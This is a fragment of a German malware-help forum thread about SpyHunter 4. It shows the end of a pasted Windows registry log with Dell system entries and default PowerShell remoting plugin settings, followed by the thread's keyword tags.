"System Manufacturer"="Dell Inc. "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"=" <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" > <InitializationParameters> <Param Name="PSVersion" Value="2.0"/> </InitializationParameters> <Resources> <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true"> <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/> <Capability Type="Shell"/> </Resource> </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" > <InitializationParameters> <Param Name="PSVersion" Value="2.0"/> </InitializationParameters> <Resources> <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true"> <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc. "
-= EOF =-
|
|
| Themen zu SpyHunter4 als Pc-Scanner... |
| account, computer, direkt, experte, falsch, ftdownloader, gekauft, guten, interne, internet, loader, log, löschen, malware, reghunter, scan, schicke, schicken, seite, seiten, spyhunter, spyhunter 4, troja, versehentlich, verteilt, werbung, wissen, überall |
Linear-Darstellung
